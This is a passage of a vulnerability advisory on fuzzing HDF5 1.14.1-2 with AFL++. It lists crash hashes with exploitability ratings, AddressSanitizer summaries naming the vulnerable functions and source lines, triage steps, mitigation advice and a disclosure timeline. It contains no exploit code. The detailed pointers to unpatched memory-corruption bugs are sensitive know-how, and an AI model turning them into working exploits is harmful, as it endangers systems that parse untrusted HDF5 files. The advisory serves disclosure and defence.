6e4dd98178befb28af8863cacbc07093 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
6ff8b28467a0e30bbf353bf6621ed9d2 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
77d3cad25d20e9298344223c8d2d0eaa PROBABLY_EXPLOITABLE The target crashed during a block move, which may indicate that the attacker can control a buffer overflow.
77e001f1dec920766158e041f2367b10 EXPLOITABLE The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
95a688f817a2661a035eafbfa5bdb1ce EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
9823d45c52507c162d4aff86ea0e1960 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
9f693cf32c7521f6048dd450c560dc4b EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
afe7ee16699107ba82ee3a4b9ac6863b EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
b7aa443ffb1b48ed5f78502053a88176 PROBABLY_EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control write address and/or value. However, it there is a chance it could be a NULL dereference.
b95ca3be3e622a4fc840451d5119aae9 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
bdfc1a84cf389b9fe270ab25ab4cb99f EXPLOITABLE The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
c2a3c435c5a299bac397e5d643bd4c13 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
d550d85ebcaec2936d45249ad2fd96bf EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
e3829772c021a3085bea31367c30018d EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
e7dc3fc21e85273a4871a6f1625e40d1 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
f73304be7d3e45624d4f6651c0688b35 EXPLOITABLE The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
f93c69013478b5b9eab33f7412e947d1 EXPLOITABLE GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior’s process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable.
f9b9a711564f1b8d07be3ce4c243d78b EXPLOITABLE The target crashed on a branch instruction, which may indicate that the control flow is tainted.
fafd175667c03a4fe3963e3cfd403b4b PROBABLY_EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control write address and/or value. However, it there is a chance it could be a NULL dereference.

30 of the above 35 crashes were reproducible under address sanitizer. The following table summarises the address sanitizer output:

Filename Summary ASAN Summary
07d6b324b8474a569ce13b34d919e125 SEGV caused by a READ memory access. in H5T__conv_i_i /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3964 SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3964 in H5T__conv_i_i
0c9d1718599c629f6ae2dc253e9f556c READ of size 553779201 in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2592 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
0e71c9cac751ed2550aee102e2956181 WRITE of size 64 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset
0e847373645d83c271065efc23814701 SEGV caused by a READ memory access in H5T__conv_struct /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2318 SUMMARY: AddressSanitizer: SEGV ../../../../src/libsanitizer/sanitizer_common/sanitizer_libc.cpp:64 in __sanitizer::internal_memmove(void*, void const*, unsigned long)
11049a56a4235093e6845a27021af15e READ of size 35329 in H5T__conv_struct /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2314 SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
161b33e54715856dee6cc2036046d00b SEGV signal caused by a READ memory access in H5T__bit_copy /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tbit.c:72 SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tbit.c:72 in H5T__bit_copy
21fcde769605d7419d5ddd86bcb2c0ab READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
2b99439e944dd50e495b73506a80c7cb No crash under address sanitizer  
2c39afc2cd6c7e4a43a6133681d1284f READ of size 9437208 in H5T__conv_array /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3586 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
2ca00f445e035ee71f6efb7a0ed388dc READ of size 524296 in H5VM_memcpyvv /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5VM.c:1535 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy
38344f8077c3bdcc40d4c88cf1b67086 READ of size 3276850 in H5T__conv_array /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3586 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
4030f62b172d41bffcaea19c3563f2d6 READ memory access in H5T__conv_struct /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2318 SUMMARY: AddressSanitizer: SEGV ../../../../src/libsanitizer/sanitizer_common/sanitizer_libc.cpp:64 in __sanitizer::internal_memmove(void*, void const*, unsigned long)
47a6f97d7f311db2fd03345389950c1b READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
56351b62615dd0aee14cfff22670150b READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4429 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4429 in H5T__conv_f_f
56707228c5602b4f9032e5c5076ae951 No crash under address sanitizer  
6ad05b7df38db254d21dfc55bf055948 Stack overflow caused by an infinite loop and stack exhaustion. SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset
6e4dd98178befb28af8863cacbc07093 SEGV caused by a READ memory access in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4429 SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4429 in H5T__conv_f_f
6ff8b28467a0e30bbf353bf6621ed9d2 No crash under address sanitizer  
77d3cad25d20e9298344223c8d2d0eaa READ of size 407088 in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2599 SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
77e001f1dec920766158e041f2367b10 READ of size 1 in H5T__bit_find /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tbit.c:440 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tbit.c:440 in H5T__bit_find
95a688f817a2661a035eafbfa5bdb1ce No crash under address sanitizer  
9823d45c52507c162d4aff86ea0e1960 READ of size 2097176 in H5T__conv_array /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3586 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
9f693cf32c7521f6048dd450c560dc4b READ of size 8 in H5G_name_free /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Gname.c:565 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Gname.c:565 in H5G_name_free
afe7ee16699107ba82ee3a4b9ac6863b READ of size 25728 in H5T__conv_array /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3586 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
b7aa443ffb1b48ed5f78502053a88176 READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
b95ca3be3e622a4fc840451d5119aae9 READ of size 1441793 in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2592 SUMMARY: AddressSanitizer: unknown-crash ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
bdfc1a84cf389b9fe270ab25ab4cb99f WRITE of size 64 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset
c2a3c435c5a299bac397e5d643bd4c13 SEGV caused by a READ memory access in H5T__conv_struct /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2318 SUMMARY: AddressSanitizer: SEGV ../../../../src/libsanitizer/sanitizer_common/sanitizer_libc.cpp:64 in __sanitizer::internal_memmove(void*, void const*, unsigned long)
d550d85ebcaec2936d45249ad2fd96bf SEGV caused by a READ memory access in H5T__conv_i_i /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3964 SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3964 in H5T__conv_i_i
e3829772c021a3085bea31367c30018d READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
e7dc3fc21e85273a4871a6f1625e40d1 SEGV signal caused by a READ memory access in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
f73304be7d3e45624d4f6651c0688b35 READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 SUMMARY: AddressSanitizer: heap-use-after-free /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
f93c69013478b5b9eab33f7412e947d1 Stack overflow caused by an infinite loop and stack exhaustion SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_format.inc:490 in printf_common
f9b9a711564f1b8d07be3ce4c243d78b Stack overflow caused by an infinite loop and stack exhaustion SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/asan/asan_allocator.cpp:361 in __asan::Allocator::ComputeRZLog(unsigned long)
fafd175667c03a4fe3963e3cfd403b4b No crash under address sanitizer  

Compilation and Running

The fuzzed library was compiled from hdf5-1.14.1-2.tar.bz2 on Debian 11 using GCC10 and the following commands:

export CFLAGS='-g -fno-omit-frame-pointer -fsanitize=address'
export CXXFLAGS='-g -fno-omit-frame-pointer -fsanitize=address'
./configure
make -j8
make install

The resulting ./hdf5/bin/h5stat utility was used to triage the crashes found by AFL++, as follows:

$ ./hdf5/bin/h5stat /home/doi/src/crashmin/4512b0fa12719efa790f5aac035f3e71
Filename: /home/doi/src/crashmin/4512b0fa12719efa790f5aac035f3e71
=================================================================
==207016==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000004d00
at pc 0x7fd075cbf269 bp 0x7ffe2ab5ea50 sp 0x7ffe2ab5e200
WRITE of size 64 at 0x602000004d00 thread T0
 #0 0x7fd075cbf268 in __interceptor_memset
../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778
 #1 0x7fd0759287f2 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394
... omitted for brevity....
==207016==ABORTING

The ./hdf5/bin/h5dump utility was used to triage the h5dump crashes, as follows:

$ ./hdf5/bin/h5dump /home/doi/src/dumpcrashmin/77d3cad25d20e9298344223c8d2d0eaa
HDF5 "exploitable/77d3cad25d20e9298344223c8d2d0eaa" {
GROUP "/" {
 DATASET "ArrayOfStructures" {
 DATATYPE H5T_COMPOUND {
 H5T_STD_I32LE "a_name";
 H5T_IEEE_F32LE "m_name";
 64-bit little-endian floating-point 64-bit precision "c_name";
 H5T_COMPOUND {
 H5T_STRING {
 STRSIZE 1;
 STRPAD H5T_STR_NULLTERM;
 CSET H5T_CSET_ASCII;
 CTYPE H5T_C_S1;
 } "char_name";
 H5T_ARRAY { [33924] 96-bit little-endian floating-point 32-bit
precision } "array_name";
 } "d_name";
 }
 DATASPACE SIMPLE { ( 254 ) / ( 254 ) }
=================================================================
==1132782==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f89d7f5081c
at pc 0x7f89de579541 bp 0x7fff18ac0ae0 sp 0x7fff18ac0290
READ of size 407088 at 0x7f89d7f5081c thread T0
 #0 0x7f89de579540 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
 #1 0x7f89de0d3bef in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2599
 #2 0x7f89de09f8ea in H5T_convert /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
 #3 0x7f89de0d41e1 in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2586
 #4 0x7f89de09f8ea in H5T_convert /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5T.c:5449

Crashing Testcases and Input Corpora

File Description
h5stat-crashes-minimized.tar.gz The 15 crashing test cases for h5stat
h5stat-input-corpus.tar.gz A coverage-based minimised input corpus consolidating the 1,000,000,000 test cases executed during the fuzzing run - Includes 1433 files
h5dump-crashes-minimized.tar.gz The 89 crashing test cases for h5dump

Recommendations

The number and potential severity of the memory corruption vulnerabilities increases the likelihood of compromise when using HDF5 to parse untrusted user data. As fixes are not available for these issues, a system which processes potentially untrusted HDF5 input should implement compensating controls such as sandboxing of the parsing process, file and input validation, and additional authentication and authorisation controls to minimise the likelihood of a real attacker exploiting these vulnerabilities.

Timeline

19/06/2023 - Initial contact with HDFGroup help desk - help desk request creation of GitHub issues - Pulse Security response explaining security issues will become public immediately once Issues are created
20/06/2023 - Request for update - HDFGroup advise technical staff will be in touch to accept technical details
28/06/2023 - Request for update
29/06/2023 - Contact from HDFGroup technical staff, request for advisory details and trial of new GitHub security issues.
30/06/2023 - Advisory details sent to HDFGroup technical staff
12/07/2023 - Request for update and advisory acknowledgement
17/07/2023 - Advisory confirmed by HDFGroup technical staff
25/07/2023 - Trial GitHub security issues created on https://github.com/HDFGroup/hdf5/
18/08/2023 - Request for update
13/09/2023 - Request for update
17/09/2023 - HDFGroup technical staff advise other aspects of the project have taken priority over addressing memory corruption vulnerabilities found through this fuzzing process
20/09/2023 - Advisory release


Follow us on LinkedIn